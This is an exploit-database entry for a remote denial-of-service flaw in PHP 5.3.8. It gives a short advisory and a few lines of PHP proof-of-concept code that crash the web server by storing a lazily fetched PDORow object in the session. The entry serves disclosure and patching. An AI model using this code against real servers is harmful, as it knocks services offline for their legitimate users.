Lucene search

K
exploitdbAnonymousEDB-ID:36682
HistorySep 24, 2011 - 12:00 a.m.

PHP PDORow Object - Remote Denial of Service

2011-09-2400:00:00
anonymous
www.exploit-db.com
32

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/51952/info

PHP is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to cause the web server to crash, denying service to legitimate users.

PHP 5.3.8 is vulnerable; other versions may also be affected. 

<?php

// make a Pdo_Mysql statement before

$result = $stmt->fetch(PDO::FETCH_LAZY);

session_start();

$_SESSION['PDORow'] = $result;
?> 

AI Score

7.4

Confidence

Low